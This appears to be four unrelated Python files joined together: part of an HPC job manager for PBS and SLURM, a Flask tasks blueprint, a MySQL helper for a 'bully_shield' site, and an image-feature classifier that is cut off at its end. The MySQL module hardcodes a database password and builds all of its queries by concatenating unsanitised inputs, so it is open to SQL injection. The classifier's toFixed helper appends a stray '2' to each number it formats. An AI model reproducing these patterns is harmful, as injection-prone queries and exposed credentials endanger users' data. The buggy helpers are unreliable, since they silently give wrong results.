if background:
SubprocessManager._subproc_run(
cmd, background=background,
background_stdout=background_stdout)
stdout, stderr = '', ''
else:
stdout, stderr = SubprocessManager._subproc_popen(cmd)
return stdout, stderr
@staticmethod
def s(s):
"""Format input as str w/ appropriate quote types for python cli entry.
Examples
--------
list, tuple -> "['one', 'two']"
dict -> "{'key': 'val'}"
int, float, None -> '0'
str, other -> 'string'
"""
if isinstance(s, (list, tuple, dict)):
return '"{}"'.format(s)
elif not isinstance(s, (int, float, type(None))):
return "'{}'".format(s)
else:
return '{}'.format(s)
@staticmethod
def format_walltime(hours):
"""Get the SLURM walltime string in format "HH:MM:SS"
Parameters
----------
hours : float | int
Requested number of job hours.
Returns
-------
walltime : str
SLURM walltime request in format "HH:MM:SS"
"""
m_str = '{0:02d}'.format(round(60 * (hours % 1)))
h_str = '{0:02d}'.format(floor(hours))
return '{}:{}:00'.format(h_str, m_str)
class PBS(SubprocessManager):
"""Subclass for PBS subprocess jobs."""
def __init__(self, cmd, alloc, queue, name='reV',
feature=None, stdout_path='./stdout'):
"""Initialize and submit a PBS job.
Parameters
----------
cmd : str
Command to be submitted in PBS shell script. Example:
'python -m reV.generation.cli_gen'
alloc : str
HPC allocation account. Example: 'rev'.
queue : str
HPC queue to submit job to. Example: 'short', 'batch-h', etc...
name : str
PBS job name.
feature : str | None
PBS feature request (-l {feature}).
Example: 'feature=24core', 'qos=high', etc...
stdout_path : str
Path to print .stdout and .stderr files.
"""
self.make_path(stdout_path)
self.id, self.err = self.qsub(cmd,
alloc=alloc,
queue=queue,
name=name,
feature=feature,
stdout_path=stdout_path)
@staticmethod
def check_status(job, var='id'):
"""Check the status of this PBS job using qstat.
Parameters
----------
job : str
Job name or ID number.
var : str
Identity/type of job identification input arg ('id' or 'name').
Returns
-------
out : str or NoneType
Qstat job status character or None if not found.
Common status codes: Q, R, C (queued, running, complete).
"""
# column location of various job identifiers
col_loc = {'id': 0, 'name': 3}
qstat_rows = PBS.qstat()
if qstat_rows is None:
return None
else:
# reverse the list so most recent jobs are first
qstat_rows = reversed(qstat_rows)
# update job status from qstat list
for row in qstat_rows:
row = row.split()
# make sure the row is long enough to be a job status listing
if len(row) > 10:
if row[col_loc[var]].strip() == job.strip():
# Job status is located at the -2 index
status = row[-2]
logger.debug('Job with {} "{}" has status: "{}"'
.format(var, job, status))
return status
return None
@staticmethod
def qstat():
"""Run the PBS qstat command and return the stdout split to rows.
Returns
-------
qstat_rows : list | None
List of strings where each string is a row in the qstat printout.
Returns None if qstat is empty.
"""
cmd = 'qstat -u {user}'.format(user=PBS.USER)
stdout, _ = PBS.submit(cmd)
if not stdout:
# No jobs are currently running.
return None
else:
qstat_rows = stdout.split('\n')
return qstat_rows
def qsub(self, cmd, alloc, queue, name='reV', feature=None,
stdout_path='./stdout', keep_sh=False):
"""Submit a PBS job via qsub command and PBS shell script
Parameters
----------
cmd : str
Command to be submitted in PBS shell script. Example:
'python -m reV.generation.cli_gen'
alloc : str
HPC allocation account. Example: 'rev'.
queue : str
HPC queue to submit job to. Example: 'short', 'batch-h', etc...
name : str
PBS job name.
feature : str | None
PBS feature request (-l {feature}).
Example: 'feature=24core', 'qos=high', etc...
stdout_path : str
Path to print .stdout and .stderr files.
keep_sh : bool
Boolean to keep the .sh files. Default is to remove these files
after job submission.
Returns
-------
out : str
qsub standard output, this is typically the PBS job ID.
err : str
qsub standard error, this is typically an empty string if the job
was submitted successfully.
"""
status = self.check_status(name, var='name')
if status in ('Q', 'R'):
warn('Not submitting job "{}" because it is already in '
'qstat with status: "{}"'.format(name, status))
out = None
err = 'already_running'
else:
feature_str = '#PBS -l {}\n'.format(str(feature).replace(' ', ''))
fname = '{}.sh'.format(name)
script = ('#!/bin/bash\n'
'#PBS -N {n} # job name\n'
'#PBS -A {a} # allocation account\n'
'#PBS -q {q} # queue (debug, short, batch, or long)\n'
'#PBS -o {p}/{n}_$PBS_JOBID.o\n'
'#PBS -e {p}/{n}_$PBS_JOBID.e\n'
'{L}'
'echo Running on: $HOSTNAME, Machine Type: $MACHTYPE\n'
'{cmd}'
.format(n=name, a=alloc, q=queue, p=stdout_path,
L=feature_str if feature else '',
cmd=cmd))
# write the shell script file and submit as qsub job
self.make_sh(fname, script)
out, err = self.submit('qsub {script}'.format(script=fname))
if not err:
logger.debug('PBS job "{}" with id #{} submitted successfully'
.format(name, out))
if not keep_sh:
self.rm(fname)
return out, err
class SLURM(SubprocessManager):
"""Subclass for SLURM subprocess jobs."""
def __init__(self, cmd, alloc, walltime, memory=None, feature=None,
name='reV', stdout_path='./stdout', conda_env=None,
module=None, module_root='/shared-projects/rev/modulefiles'):
"""Initialize and submit a PBS job.
Parameters
----------
cmd : str
Command to be submitted in PBS shell script. Example:
'python -m reV.generation.cli_gen'
alloc : str
HPC project (allocation) handle. Example: 'rev'.
walltime : float
Node walltime request in hours.
memory : int, Optional
Node memory request in GB.
feature : str
Additional flags for SLURM job. Format is "--qos=high"
or "--depend=[state:job_id]". Default is None.
name : str
SLURM job name.
stdout_path : str
Path to print .stdout and .stderr files.
conda_env : str
Conda environment to activate
module : str
Module to load
module_root : str
Path to module root to load
"""
self.make_path(stdout_path)
self.out, self.err = self.sbatch(cmd,
alloc=alloc,
memory=memory,
walltime=walltime,
feature=feature,
name=name,
stdout_path=stdout_path,
conda_env=conda_env,
module=module,
module_root=module_root)
if self.out:
self.id = self.out.split(' ')[-1]
else:
self.id = None
@staticmethod
def check_status(job, var='id'):
"""Check the status of this PBS job using qstat.
Parameters
----------
job : str
Job name or ID number.
var : str
Identity/type of job identification input arg ('id' or 'name').
Returns
-------
out : str | NoneType
squeue job status str or None if not found.
Common status codes: PD, R, CG (pending, running, complete).
"""
# column location of various job identifiers
col_loc = {'id': 0, 'name': 2}
if var == 'name':
# check for specific name
squeue_rows = SLURM.squeue(name=job)
else:
squeue_rows = SLURM.squeue()
if squeue_rows is None:
return None
else:
# reverse the list so most recent jobs are first
squeue_rows = reversed(squeue_rows)
# update job status from qstat list
for row in squeue_rows:
row = row.split()
# make sure the row is long enough to be a job status listing
if len(row) > 7:
if row[col_loc[var]].strip() in job.strip():
# Job status is located at the 4 index
status = row[4]
logger.debug('Job with {} "{}" has status: "{}"'
.format(var, job, status))
return row[4]
return None
@staticmethod
def squeue(name=None):
"""Run the SLURM squeue command and return the stdout split to rows.
Parameters
----------
name : str | None
Optional to check the squeue for a specific job name (not limited
to the 8 shown characters) or show users whole squeue.
Returns
-------
squeue_rows : list | None
List of strings where each string is a row in the squeue printout.
Returns None if squeue is empty.
"""
cmd = ('squeue -u {user}{job_name}'
.format(user=SLURM.USER,
job_name=' -n {}'.format(name) if name else ''))
stdout, _ = SLURM.submit(cmd)
if not stdout:
# No jobs are currently running.
return None
else:
squeue_rows = stdout.split('\n')
return squeue_rows
@staticmethod
def scontrol(cmd):
"""Submit an scontrol command.
Parameters
----------
cmd : str
Command string after "scontrol" word
"""
cmd = 'scontrol {}'.format(cmd)
cmd = shlex.split(cmd)
subprocess.call(cmd)
@staticmethod
def scancel(arg):
"""Cancel a slurm job.
Parameters
----------
arg : int | list | str
SLURM job id(s) to cancel. Can be a list of integer job ids, 'all'
to cancel all jobs, or a feature (-p short) to cancel all jobs
with a given feature
"""
if isinstance(arg, (list, tuple)):
for jid in arg:
SLURM.scancel(jid)
elif str(arg).lower() == 'all':
sq = SLURM.squeue()
for row in sq[1:]:
job_id = int(row.strip().split(' ')[0])
SLURM.scancel(job_id)
elif isinstance(arg, (int, str)):
cmd = ('scancel {}'.format(arg))
cmd = shlex.split(cmd)
subprocess.call(cmd)
else:
e = ('Could not cancel: {} with type {}'
.format(arg, type(arg)))
logger.error(e)
raise ExecutionError(e)
@staticmethod
def change_qos(arg, qos):
"""Change the priority (quality of service) for a job.
Parameters
----------
arg : int | list | str
SLURM job id(s) to change qos for. Can be 'all' for all jobs.
qos : str
New qos value
"""
if isinstance(arg, (list, tuple)):
for jid in arg:
SLURM.change_qos(jid, qos)
elif isinstance(arg, int):
cmd = 'update job {} QOS={}'.format(arg, qos)
SLURM.scontrol(cmd)
elif str(arg).lower() == 'all':
sq = SLURM.squeue()
for row in sq[1:]:
row_list = [x for x in row.strip().split(' ') if x != '']
job_id = int(row_list[0])
status = row_list[4]
if status == 'PD':
SLURM.change_qos(job_id, qos)
else:
e = ('Could not change qos of: {} with type {}'
.format(arg, type(arg)))
logger.error(e)
raise ExecutionError(e)
@staticmethod
def hold(arg):
"""Temporarily hold a job from submitting. Held jobs will stay in queue
but will not get nodes until released.
Parameters
----------
arg : int | list | str
SLURM job id(s) to hold. Can be 'all' to hold all jobs.
"""
if isinstance(arg, (list, tuple)):
for jid in arg:
SLURM.hold(jid)
elif isinstance(arg, int):
cmd = 'hold {}'.format(arg)
SLURM.scontrol(cmd)
elif str(arg).lower() == 'all':
sq = SLURM.squeue()
for row in sq[1:]:
row_list = [x for x in row.strip().split(' ') if x != '']
job_id = int(row_list[0])
status = row_list[4]
if status == 'PD':
SLURM.hold(job_id)
else:
e = ('Could not hold: {} with type {}'
.format(arg, type(arg)))
logger.error(e)
raise ExecutionError(e)
@staticmethod
def release(arg):
"""Release a job that was previously on hold so it will be submitted
to a compute node.
Parameters
----------
arg : int | list | str
SLURM job id(s) to release. Can be 'all' to release all jobs.
"""
if isinstance(arg, (list, tuple)):
for jid in arg:
SLURM.release(jid)
elif isinstance(arg, int):
cmd = 'release {}'.format(arg)
SLURM.scontrol(cmd)
elif str(arg).lower() == 'all':
sq = SLURM.squeue()
for row in sq[1:]:
row_list = [x for x in row.strip().split(' ') if x != '']
job_id = int(row_list[0])
status = row_list[4]
reason = row_list[-1]
if status == 'PD' and 'jobheld' in reason.lower():
SLURM.release(job_id)
else:
e = ('Could not release: {} with type {}'
.format(arg, type(arg)))
logger.error(e)
raise ExecutionError(e)
def sbatch(self, cmd, alloc, walltime, memory=None, feature=None,
name='reV', stdout_path='./stdout', keep_sh=False,
conda_env=None, module=None,
module_root='/shared-projects/rev/modulefiles'):
"""Submit a SLURM job via sbatch command and SLURM shell script
Parameters
----------
cmd : str
Command to be submitted in PBS shell script. Example:
'python -m reV.generation.cli_gen'
alloc : str
HPC project (allocation) handle. Example: 'rev'.
walltime : float
Node walltime request in hours.
memory : int
Node memory request in GB.
feature : str
Additional flags for SLURM job. Format is "--qos=high"
or "--depend=[state:job_id]". Default is None.
name : str
SLURM job name.
stdout_path : str
Path to print .stdout and .stderr files.
keep_sh : bool
Boolean to keep the .sh files. Default is to remove these files
after job submission.
conda_env : str
Conda environment to activate
module : bool
Module to load
module_root : str
Path to module root to load
Returns
-------
out : str
sbatch standard output, this is typically the SLURM job ID.
err : str
sbatch standard error, this is typically an empty string if the job
was submitted successfully.
"""
status = self.check_status(name, var='name')
if status in ('PD', 'R'):
warn('Not submitting job "{}" because it is already in '
'squeue with status: "{}"'.format(name, status))
out = None
err = 'already_running'
else:
feature_str = ''
if feature is not None:
feature_str = '#SBATCH {} # extra feature\n'.format(feature)
mem_str = ''
if memory is not None:
mem_str = ('#SBATCH --mem={} # node RAM in MB\n'
.format(int(memory * 1000)))
env_str = ''
if module is not None:
env_str = ("echo module use {module_root}\n"
"module use {module_root}\n"
"echo module load {module}\n"
"module load {module}\n"
"echo module load complete!\n"
.format(module_root=module_root, module=module))
elif conda_env is not None:
env_str = ("echo source activate {conda_env}\n"
"source activate {conda_env}\n"
"echo conda env activate complete!\n"
.format(conda_env=conda_env))
fname = '{}.sh'.format(name)
script = ('#!/bin/bash\n'
'#SBATCH --account={a} # allocation account\n'
'#SBATCH --time={t} # walltime\n'
'#SBATCH --job-name={n} # job name\n'
'#SBATCH --nodes=1 # number of nodes\n'
'#SBATCH --output={p}/{n}_%j.o\n'
'#SBATCH --error={p}/{n}_%j.e\n{m}{f}'
'echo Running on: $HOSTNAME, Machine Type: $MACHTYPE\n'
'{e}\n{cmd}'
.format(a=alloc, t=self.format_walltime(walltime),
n=name, p=stdout_path, m=mem_str,
f=feature_str, e=env_str, cmd=cmd))
# write the shell script file and submit as qsub job
self.make_sh(fname, script)
out, err = self.submit('sbatch {script}'.format(script=fname))
if err:
w = 'Received a SLURM error or warning: {}'.format(err)
logger.warning(w)
warn(w, SlurmWarning)
else:
logger.debug('SLURM job "{}" with id #{} submitted '
'successfully'.format(name, out))
if not keep_sh:
self.rm(fname)
return out, err
class SpawnProcessPool(cf.ProcessPoolExecutor):
"""An adaptation of concurrent futures ProcessPoolExecutor with
spawn processes instead of fork or forkserver."""
def __init__(self, *args, loggers=None, **kwargs):
"""
Parameters
----------
loggers : str | list, optional
logger(s) to initialize on workers, by default None
"""
if 'mp_context' in kwargs:
w = ('SpawnProcessPool being initialized with mp_context: "{}". '
'This will override default SpawnProcessPool behavior.'
.format(kwargs['mp_context']))
logger.warning(w)
warn(w, ParallelExecutionWarning)
else:
kwargs['mp_context'] = multiprocessing.get_context('spawn')
if loggers is not None:
kwargs['initializer'] = LOGGERS.init_logger
kwargs['initargs'] = (loggers, )
super().__init__(*args, **kwargs)
def execute_parallel(fun, execution_iter, n_workers=None, **kwargs):
"""Execute concurrent futures with an established cluster.
Parameters
----------
fun : function
Python function object that will be submitted to futures. See
downstream execution methods for arg passing structure.
execution_iter : iter
Python iterator that controls the futures submitted in parallel.
n_workers : int
Number of workers to run in parallel
**kwargs : dict
Key word arguments passed to the fun.
Returns
-------
results : list
List of futures results.
"""
futures = []
# initialize a client based on the input cluster.
with SpawnProcessPool(max_workers=n_workers) as executor:
# iterate through split executions, submitting each to worker
for i, exec_slice in enumerate(execution_iter):
logger.debug('Kicking off serial worker #{} for: {}'
.format(i, exec_slice))
# submit executions and append to futures list
futures.append(executor.submit(execute_single, fun, exec_slice,
worker=i, **kwargs))
# gather results
results = [future.result() for future in futures]
return results
def execute_single(fun, input_obj, worker=0, **kwargs):
"""Execute a serial compute on a single core.
Parameters
----------
fun : function
Function to execute.
input_obj : object
Object passed as first argument to fun. Typically a project control
object that can be the result of iteration in the parallel execution
framework.
worker : int
Worker number (for debugging purposes).
**kwargs : dict
Key word arguments passed to fun.
"""
logger.debug('Running single serial execution on worker #{} for: {}'
.format(worker, input_obj))
out = fun(input_obj, **kwargs)
log_mem()
return out
class SmartParallelJob:
"""Single node parallel compute manager with smart data flushing."""
def __init__(self, obj, execution_iter, n_workers=None, mem_util_lim=0.7):
"""Single node parallel compute manager with smart data flushing.
Parameters
----------
obj : object
Python object that will be submitted to futures. Must have methods
run(arg) and flush(). run(arg) must take the iteration result of
execution_iter as the single positional argument. Additionally,
the results of obj.run(arg) will be pa ssed to obj.out. obj.out
will be passed None when the memory is to be cleared. It is
advisable that obj.run() be a @staticmethod for dramatically
faster submission in parallel.
execution_iter : iter
Python iterator that controls the futures submitted in parallel.
n_workers : int
Number of workers to use in parallel. None will use all
available workers.
mem_util_lim : float
Memory utilization limit (fractional). If the used memory divided
by the total memory is greater than this value, the obj.out will
be flushed and the local node memory will be cleared.
"""
if not hasattr(obj, 'run') or not hasattr(obj, 'flush'):
raise ExecutionError('Parallel execution with object: "{}" '
'failed. The target object must have methods '
'run() and flush()'.format(obj))
self._obj = obj
self._execution_iter = execution_iter
self._n_workers = n_workers
self._mem_util_lim = mem_util_lim
@property
def execution_iter(self):
"""Get the iterator object that controls the parallel execution.
Returns
-------
_execution_iter : iterable
Iterable object that controls the processes of the parallel job.
"""
return self._execution_iter
@property
def mem_util_lim(self):
"""Get the memory utilization limit (fractional).
Returns
-------
_mem_util_lim : float
Fractional memory utilization limit. If the used memory divided
by the total memory is greater than this value, the obj.out will
be flushed and the local node memory will be cleared.
"""
return self._mem_util_lim
@property
def n_workers(self):
"""Get the number of workers in the local cluster.
Returns
-------
_n_workers : int
Number of workers. Default value is the number of CPU's.
"""
if self._n_workers is None:
self._n_workers = os.cpu_count()
return self._n_workers
@property
def obj(self):
"""Get the main python object that will be submitted to futures.
Returns
-------
_obj : Object
Python object that will be submitted to futures. Must have methods
run(arg) and flush(). run(arg) must take the iteration result of
execution_iter as the single positional argument. Additionally,
the results of obj.run(arg) will be passed to obj.out. obj.out
will be passed None when the memory is to be cleared. It is
advisable that obj.run() be a @staticmethod for dramatically
faster submission in parallel.
"""
return self._obj
def flush(self):
"""Flush obj.out to disk, set obj.out=None, and garbage collect."""
# memory utilization limit exceeded, flush memory to disk
self.obj.flush()
self.obj.out = None
gc.collect()
def gather_and_flush(self, i, futures, force_flush=False):
"""Wait on futures, potentially update obj.out and flush to disk.
Parameters
----------
i : int | str
Iteration number (for logging purposes).
futures : list
List of parallel future objects to wait on or gather.
force_flush : bool
Option to force a disk flush. Useful for end-of-iteration. If this
is False, will only flush to disk if the memory utilization exceeds
the mem_util_lim.
Returns
-------
futures : list
List of parallel future objects. If the memory was flushed, this is
a cleared list: futures.clear()
"""
# gather on each iteration so there is no big mem spike during flush
# (obj.out should be a property setter that will append new data.)
self.obj.out = [future.result() for future in futures]
futures.clear()
# useful log statements
mem = psutil.virtual_memory()
logger.info('Parallel run at iteration {0}. '
'Memory utilization is {1:.3f} GB out of {2:.3f} GB '
'total ({3:.1f}% used, limit of {4:.1f}%)'
.format(i, mem.used / 1e9, mem.total / 1e9,
100 * mem.used / mem.total,
100 * self.mem_util_lim))
# check memory utilization against the limit
if ((mem.used / mem.total) >= self.mem_util_lim) or force_flush:
# restart client to free up memory
# also seems to sync stderr messages (including warnings)
# flush data to disk
logger.info('Flushing memory to disk. The memory utilization is '
'{0:.2f}% and the limit is {1:.2f}%.'
.format(100 * (mem.used / mem.total),
100 * self.mem_util_lim))
self.flush()
return futures
def run(self, **kwargs):
"""
Run ParallelSmartJobs
Parameters
----------
kwargs : dict
Keyword arguments to be passed to obj.run(). Makes it easier to
have obj.run() as a @staticmethod.
"""
logger.info('Executing parallel run on a local cluster with '
'{0} workers over {1} total iterations.'
.format(self.n_workers, 1 + len(self.execution_iter)))
log_mem()
# initialize a client based on the input cluster.
with SpawnProcessPool(max_workers=self.n_workers) as executor:
futures = []
# iterate through split executions, submitting each to worker
for i, exec_slice in enumerate(self.execution_iter):
logger.debug('Kicking off serial worker #{0} for: {1}. '
.format(i, exec_slice))
# submit executions and append to futures list
futures.append(executor.submit(self.obj.run, exec_slice,
**kwargs))
# Take a pause after one complete set of workers
if (i + 1) % self.n_workers == 0:
futures = self.gather_and_flush(i, futures)
# All futures complete
self.gather_and_flush('END', futures, force_flush=True)
logger.debug('Smart parallel job complete. Returning execution '
'control to higher level processes.')
log_mem()
@classmethod
def execute(cls, obj, execution_iter, n_workers=None,
mem_util_lim=0.7, **kwargs):
"""Execute the smart parallel run with data flushing.
Parameters
----------
obj : object
Python object that will be submitted to futures. Must have methods
run(arg) and flush(). run(arg) must take the iteration result of
execution_iter as the single positional argument. Additionally,
the results of obj.run(arg) will be passed to obj.out. obj.out
will be passed None when the memory is to be cleared. It is
advisable that obj.run() be a @staticmethod for dramatically
faster submission in parallel.
execution_iter : iter
Python iterator that controls the futures submitted in parallel.
n_workers : int
Number of workers to scale the cluster to. None will use all
available workers in a local cluster.
mem_util_lim : float
Memory utilization limit (fractional). If the used memory divided
by the total memory is greater than this value, the obj.out will
be flushed and the local node memory will be cleared.
kwargs : dict
Keyword arguments to be passed to obj.run(). Makes it easier to
have obj.run() as a @staticmethod.
"""
manager = cls(obj, execution_iter, n_workers=n_workers,
mem_util_lim=mem_util_lim)
manager.run(**kwargs)
|
from flask import Flask, render_template, request, redirect
from flask import Blueprint
from repositories import task_repository, user_repository
from models.task import Task
tasks_blueprint = Blueprint("tasks", __name__)
@tasks_blueprint.route('/tasks')
def tasks():
# Get all the tasks
tasks = task_repository.select_all()
# return a HTML view showing listing all the tasks
return render_template("tasks/index.html", all_tasks=tasks)
@tasks_blueprint.route('/tasks/new')
def new_task():
# get all the users fro mthe database
users = user_repository.select_all()
# return html displays a form to create a new task
return render_template('tasks/new.html', all_users=users)
@tasks_blueprint.route('/tasks', methods=['POST'])
def create_task():
# grab all the bits from the form and assign to variables
description = request.form["description"]
user_id = request.form["user"]
duration = request.form["duration"]
completed = request.form["completed"]
# find the right user from the database on the user id from data
user = user_repository.select(user_id)
# create a new Task object based on that form data
task = Task(description, user, duration, completed)
# save it to the data base - save function from task repository
task_repository.save(task)
# redirect back to all tasks view
return redirect('/tasks')
@tasks_blueprint.route('/tasks/<id>')
def show_task(id):
# capture the id parameter from the url
# find the right task in the db by the id
task = task_repository.select(id)
# render an html view with the task details
return render_template('tasks/show.html', selected_task=task)
@tasks_blueprint.route("/tasks/<id>/edit", methods=['GET'])
def edit_task(id):
task = task_repository.select(id)
users = user_repository.select_all()
return render_template('tasks/edit.html', task = task, all_users = users)
@tasks_blueprint.route("/tasks/<id>", methods=['POST'])
def update_task(id):
description = request.form['description']
user_id = request.form['user_id']
duration = request.form['duration']
completed = request.form['completed']
user = user_repository.select(user_id)
task = Task(description, user, duration, completed, id)
task_repository.update(task)
return redirect('/tasks')
@tasks_blueprint.route("/tasks/<id>/delete", methods=['POST'])
def delete_task(id):
task_repository.delete(id)
return redirect('/tasks')
|
import MySQLdb
import re
"""
Connects to the MySQL database. Various functions to retrieve and update data.
Each function a forms new connection with the server, for ease of access
in project development.
Functions:
add_to_blacklist(word) - Inserts word into blacklist, if word already exists
will replace the row.
- Requires word argument as String. DOES NOT CHECK IF IS
SINGLE WORD - YET.
check_connection() - Checks that a connection can be established.
get_flags(userID, flagToGet) - Returns a boolean depending on value of specified
flag for that user
get_score(userID) - Returns the current score for a given userID
get_message - Returns the body of the message from the messageID
increase_score(userID, score) - Sets the score of a userID
- Requires UserID as int, score as int
mass_add_to_BL(fileToPush) - Mass inserts words from a text file
- Requires a path to text file given as String
- file must contain words to insert on separate lines
pull_blacklist() - Takes all word entries from black_list, ensures all
are lower case, and adds to blackList[]
set_flag(userID, flagToSet) - Sets the specified flag of a given user to 1
- Requires user ID as int or string, flagToSet as string
atm 'flag'
unset_flag(userID, flagToSet) - Sets the specified flag of a given user to 0
- Requires user ID as int or string, flagToSet as string
ie 'flag'
get_guardian_email(userID) - Returns guardian email string of given user
- Requires user ID as int or string
get_other(userId, messageId) - Returns user ID of other user that received the message
- Requires sender and message IDs as ints or strings
"""
#Connection Settings
DB_HOST = "localhost"
DB_USER = "bully_shield"
DB_PSWD = "22224568"
DB_NAME = "bullyshield_website"
#global list of black-listed words
blackList = []
def add_to_blacklist(word):
db = MySQLdb.connect(DB_HOST, DB_USER, DB_PSWD, DB_NAME)
cursor = db.cursor()
wordToInsert = word.lower()
sqlPull = "SELECT word FROM `black_list`"
sqlPush = "REPLACE INTO `black_list` (`word`) VALUES ('" \
+ wordToInsert + "');"
try:
cursor.execute(sqlPush)
db.commit()
except:
print("Something went wrong!")
db.rollback()
finally:
if db:
db.close()
def check_connection():
db = MySQLdb.connect(DB_HOST, DB_USER, DB_PSWD, DB_NAME) #connect to database
cursor = db.cursor() #create cursor object
sql = "SELECT VERSION()" #SQL string to query db
try:
cursor.execute(sql) #attempt to query db
result = cursor.fetchone() #fetch value of one row
print "version: %s" % result
except:
print("Connection cannot be established")
finally:
if db:
db.close() #always close connecton
def get_flags(userID, flagToGet):
userId = str(userID)
is_flagged = False
sql = "SELECT `" + flagToGet + "` FROM `fos_user` WHERE id ='" + userId + "'"
db = MySQLdb.connect(DB_HOST, DB_USER, DB_PSWD, DB_NAME)
cursor = db.cursor()
try:
cursor.execute(sql)
result = cursor.fetchone()
if(result[0] == 1):
is_flagged = True;
except:
print("Something went wrong!")
finally:
if db:
db.close()
return is_flagged
def get_score(userID):
userId = str(userID)
sql = "SELECT `score` FROM `fos_user` WHERE id ='" + userId + "'"
db = MySQLdb.connect(DB_HOST, DB_USER, DB_PSWD, DB_NAME)
cursor = db.cursor()
try:
cursor.execute(sql)
result = cursor.fetchone()
except:
print("Something went wrong!")
finally:
if db:
db.close()
return int(result[0])
def get_message(messageID):
messageId = str(messageID)
sql = "SELECT `body` FROM `message` WHERE id ='" + messageId + "'"
db = MySQLdb.connect(DB_HOST, DB_USER, DB_PSWD, DB_NAME)
cursor = db.cursor()
try:
cursor.execute(sql)
result = cursor.fetchone()
except:
print("Something went wrong!")
finally:
if db:
db.close()
return result[0]
def increase_score(userID, score):
userId = str(userID)
score = str(score)
db = MySQLdb.connect(DB_HOST, DB_USER, DB_PSWD, DB_NAME)
cursor = db.cursor()
sql = "UPDATE `fos_user` SET `score` = `score` + '" + score \
+ "' WHERE `fos_user`.`id` = '" + userId + "'"
try:
cursor.execute(sql)
db.commit()
except:
print("Something went wrong!")
db.rollback()
finally:
if db:
db.close()
def mass_add_to_BL(fileToPush):
wordArray = []
wordFile = open(fileToPush, "r")
for word in wordFile:
newWord = str(word)
newWord = newWord.lower()
newWord = newWord.strip()
newWord = re.sub('[)`,(\'"]', '', newWord)
wordArray.append(newWord)
for word in wordArray:
try:
add_to_blacklist(word)
except:
print("Something went wrong in mass add")
finally:
wordFile.close()
def pull_blacklist():
db = MySQLdb.connect(DB_HOST, DB_USER, DB_PSWD, DB_NAME)
cursor = db.cursor()
sql = "SELECT word FROM `black_list`"
tempList = []
try:
cursor.execute(sql)
results = cursor.fetchall()
for row in results:
tempList.append(row)
for i in tempList:
i = str(i)
i = i.lower()
j = re.sub('[),(\'"]', '', i)
blackList.append(j)
except:
print("Something went wrong!")
finally:
return blackList
if db:
db.close()
def set_flag(userId, flagToSet):
userId = str(userId)
db = MySQLdb.connect(DB_HOST, DB_USER, DB_PSWD, DB_NAME)
cursor = db.cursor()
sql = "UPDATE `fos_user` SET `" + flagToSet \
+ "` = '1' WHERE `fos_user`.`id` = '" + userId + "'"
try:
cursor.execute(sql)
db.commit()
except:
print("Something went wrong!")
db.rollback()
finally:
if db:
db.close()
def unset_flag(userId, flagToSet):
userId = str(userId)
db = MySQLdb.connect(DB_HOST, DB_USER, DB_PSWD, DB_NAME)
cursor = db.cursor()
sql = "UPDATE `fos_user` SET `" + flagToSet \
+ "` = '0' WHERE `fos_user`.`id` = '" + userId + "'"
try:
cursor.execute(sql)
db.commit()
except:
print("Something went wrong!")
db.rollback()
finally:
if db:
db.close()
def get_guardian_email(userId):
db = MySQLdb.connect(DB_HOST, DB_USER, DB_PSWD, DB_NAME)
cursor = db.cursor()
query = "SELECT guardian FROM `fos_user` WHERE id='" + str(userId) + "'"
try:
cursor.execute(query)
return cursor.fetchone()[0]
except:
print("Something went wrong!")
db.rollback()
finally:
if db:
db.close()
def get_other(userId, messageId):
db = MySQLdb.connect(DB_HOST, DB_USER, DB_PSWD, DB_NAME)
cursor = db.cursor()
query = "SELECT participant_id FROM thread_metadata " \
"WHERE thread_id IN (SELECT thread_id FROM message WHERE id='"+str(messageId)+"') " \
"AND participant_id !=" + str(userId)
try:
cursor.execute(query)
other_participant_id = cursor.fetchone()[0]
return other_participant_id
except:
print("Something went wrong!")
db.rollback()
finally:
if db:
db.close()
|
import pandas as pd
import numpy as np
from PIL import Image
#Оставляем у числа только 3 знака после запятой
def toFixed(numObj, digits=3):
return f"{numObj:.{digits}f}2"
#Все бинарные изображения почему-то имеют значения не 1 и 0, а 255 и 0. Эта функция исправляет проблему.
def foo(item):
if (item == 255):
return 1
return 0
def weight_of_black(image, arr):
area = (arr[0], arr[1], arr[2], arr[3])
symbol = image.crop(area)
width, height = symbol.size
sum_ = 0
for x in range(width):
for y in range(height):
sum_ += foo(symbol.getpixel((x,y)))
return width * height - sum_, (width * height - sum_) / (width * height)
def coords_of_center_of_gravity(image, arr):
area = (arr[0], arr[1], arr[2], arr[3])
symbol = image.crop(area)
width, height = symbol.size
sum1 = 0
sum2 = 0
for x in range(width):
for y in range(height):
sum1 += (x + 1) * (1 - foo(symbol.getpixel((x,y))))
for x in range(width):
for y in range(height):
sum2 += (y + 1) * (1 - foo(symbol.getpixel((x,y))))
weight = weight_of_black(image, arr)
return sum1 / weight[0] , sum2 / weight[0]
def norm_coords_of_center_of_gravity(image, arr):
area = (arr[0], arr[1], arr[2], arr[3])
symbol = image.crop(area)
width, height = symbol.size
sum1 = 0
sum2 = 0
for x in range(width):
for y in range(height):
sum1 += (x + 1)* (1 - foo(symbol.getpixel((x,y))))
for x in range(width):
for y in range(height):
sum2 += (y + 1) * (1 - foo(symbol.getpixel((x,y))))
weight = weight_of_black(image, arr)[0]
return ((sum1 / weight) - 1) / (width - 1), ((sum2 / weight) - 1) / (height - 1)
def norm_axial_moments_of_inertia(image, arr):
area = (arr[0], arr[1], arr[2], arr[3])
symbol = image.crop(area)
width, height = symbol.size
sum1 = 0
sum2 = 0
center = coords_of_center_of_gravity(image, arr)
for x in range(width):
for y in range(height):
sum1 += ((1 - foo(symbol.getpixel((x,y)))) * ((y + 1 - center[1]) ** 2))
for x in range(width):
for y in range(height):
sum2 += ((1 - foo(symbol.getpixel((x,y)))) * ((x + 1 - center[0]) ** 2))
return sum1 / ((width ** 2) + (height ** 2)), sum2 / ((width ** 2) + (height ** 2))
#Мера близости
def p_measure(d):
return 1/(1 + 0.8 * d)
class Predictor:
def __init__(self, X, y):
self.X = X
self.y = y
def predict(self, X):
predictions = []
for vls in X:
d = 0
for index, value in enumerate(vls):
d += (self.X[:, index] - value)**2
d=np.sqrt(d)
idx = np.argsort(d)
predictions.append([(self.y[index], float(toFixed(p_measure(d[index]), 5))) for index in idx])
return predictions
def process_image(df_data, image, arrs):
df = pd.DataFrame({'A' : [weight_of_black(image, arr)[1] for arr in arrs],
'B' : [norm_coords_of_center_of_gravity(image, arr)[0] for arr in arrs],
'C' : [norm_coords_of_center_of_gravity(image, arr)[1] for arr in arrs],
'D' : [norm_axial_moments_of_inertia(image, arr)[0] for arr in arrs],
'E' : [norm_axial_moments_of_inertia(image, arr)[1] for arr in arrs]})
columns = ['symbol', 'B', 'E', 'F', 'I', 'J']
